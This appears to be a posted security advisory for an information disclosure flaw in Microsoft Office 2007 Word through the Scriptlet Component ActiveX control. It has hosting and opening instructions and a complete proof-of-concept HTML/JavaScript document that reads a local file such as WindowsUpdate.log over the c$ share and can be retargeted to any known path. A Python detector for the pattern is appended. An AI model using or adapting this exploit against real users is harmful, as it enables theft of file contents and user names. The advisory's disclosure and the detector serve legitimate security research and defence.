Microsoft Office 2007 Word Information Disclosure

Posted Oct 1, 2017
Authored by Eduardo Braun Prado

Microsoft Office 2007 Word suffers from an information disclosure vulnerability.

tags | exploit, info disclosure
SHA-256 | c9b6bb05b51dd531cede6d08c5bfdad7704a05145db11d28203d5380ae3673b9

MS Office Word Information Disclosure Vulnerability

Vendor homepage: http://www.microsoft.com/

MS Office homepage: https://products.office.com/

MS Office Word contains an Internet Explorer (IE) script execution issue through a currently well-known vector:
the "Microsoft Scriptlet Component" ActiveX control.
Originally found by information security researcher Juan Pablo Lopez Yacubian and made public in May 2008, this issue
allowed web pages to be displayed inline in Office documents, rendered by the MS IE rendering engine.
This issue facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft did not think it suitable to disable the ActiveX control
back in 2008, for some unknown reason. Additionally, it was not (publicly) known that relative URLs could be
passed to the ActiveX control, causing a Word/Works document to reference itself as HTML, potentially
disclosing sensitive information to malicious attackers, such as file contents, the Windows user name, etc.

The PoC below displays, in an alert box, the contents of 'WindowsUpdate.log'. Depending on the
Windows patch level, this file used to be located in the "c:\windows" directory, but currently it resides in
the profile directory of the user that applied the updates:

c:\users\%username%\AppData\Local\Microsoft\Windows


Instructions:

a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.

b) Download it using your preferred web browser, and save it to one of your user's profile subfolders.
(It could be the home directory too; however, nowadays most browsers will by default save the file to the
'Downloads' folder.)

c) Open it and wait for an alert box showing the contents of "WindowsUpdate.log" to show up. Notice that
any file can be picked as long as the full path is known.

Important: the file must be downloaded and forced into the "Internet Zone" of IE through the Mark of
the Web, which several programs append to files downloaded from the web.




-------------Disclose_File.WPS------------------------------------------------------------
<html><body>

<!-- if you want another file name for the Word/Works document, overwrite 'Disclose_File.wps' with
the file name you wish -->

<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>

<script language=javascript>

var loc = document.location.href.toLowerCase();
var locNoProtocol = loc.substring(8, loc.length);

// positions of the '/' separators in the URL path
var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1 + 1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2 + 1);
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3 + 1);

// returns the Windows user name, when this document is referenced through the default "C$" share.
var usr = locNoProtocol.substring(b3 + 1, b4);

// change the path below to match another file whose contents you wish to grab.
var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";

// assuming the drive letter for the Windows install, including the user's profile, is 'c:'
var t = loc.indexOf("c:");
var tr = loc.indexOf("c$");

if (t != -1)
{
    var ns = loc.substring(t + 2, loc.length);
    document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
else if (tr != -1)
{
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", fileToDisclose, 0);
    x.Send();
    var fileContents = x.ResponseText;
    alert(fileContents);
}

</script>

</body>
</html>

-------------------------------------------------------------------------------------------------------------------

Vulnerable: MS Office 2007

MS Office 2010, 2013 and 2016 have killbitted this ActiveX control through MS Office-specific killbit settings. If an attacker
is somehow able to bypass it, the vulnerability will surely affect the latest versions.

Tested on: any Windows version that supports Office 2007.
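As an added example (not part of the advisory or its PoC), the following Python check flags the pattern this PoC relies on in a downloaded Word/Works file: an <object> tag for the Scriptlet Component CLSID combined with a relative url parameter (the self-reference trick) and local file access via Microsoft.XMLHTTP or a file:// administrative-share URL. Both sample documents below are constructed for the example; the function and variable names are the example's own.

```python
import re

# CLSID of the "Microsoft Scriptlet Component" ActiveX named in the advisory.
SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"

_OBJECT_RE = re.compile(
    r"<object\b[^>]*\bclassid\s*=\s*[\"']?clsid:([0-9a-f-]{36})", re.I)
_URL_PARAM_RE = re.compile(
    r"<param\b[^>]*\bname\s*=\s*[\"']?url[\"']?[^>]*\bvalue\s*=\s*[\"']?([^\"'>\s]+)", re.I)
# XMLHTTP from document script, or a file:// URL pointing at an admin share such as c$
_LOCAL_READ_RE = re.compile(r"Microsoft\.XMLHTTP|file://[^\"'\s]*/[a-z]\$/", re.I)

def is_relative_url(url: str) -> bool:
    """True for values like 'Disclose_File.wps' that resolve against the document's own location."""
    return not re.match(r"^[a-z][a-z0-9+.-]*:", url, re.I) and not url.startswith("//")

def scan_document(data: bytes, filename: str) -> dict:
    """Scan raw file bytes; filename is the on-disk name used to spot self-references."""
    text = data.decode("latin-1")  # never fails, tolerates binary padding in .wps/.doc files
    clsids = {m.group(1).upper() for m in _OBJECT_RE.finditer(text)}
    urls = [m.group(1) for m in _URL_PARAM_RE.finditer(text)]
    relative = [u for u in urls if is_relative_url(u)]
    self_ref = [u for u in relative if u.rsplit("/", 1)[-1].lower() == filename.lower()]
    scriptlet = SCRIPTLET_CLSID in clsids
    local_read = bool(_LOCAL_READ_RE.search(text))
    return {
        "scriptlet_object": scriptlet,
        "relative_url_params": relative,
        "self_reference": bool(self_ref),
        "local_file_access": local_read,
        "suspicious": scriptlet and (bool(relative) or local_read),
    }

# Constructed sample modelled on the advisory's PoC structure (not the original file).
SUSPICIOUS_DOC = b"""<html><body>
<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>
<script language=javascript>
var x = new ActiveXObject("Microsoft.XMLHTTP");
</script></body></html>"""

# Constructed benign sample: a different control and an absolute URL.
BENIGN_DOC = b"""<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000">
<param name="url" value="https://example.invalid/page.html">
</object></body></html>"""

if __name__ == "__main__":
    for name, blob in (("Disclose_File.WPS", SUSPICIOUS_DOC), ("notes.wps", BENIGN_DOC)):
        print(name, scan_document(blob, name))
```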

Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
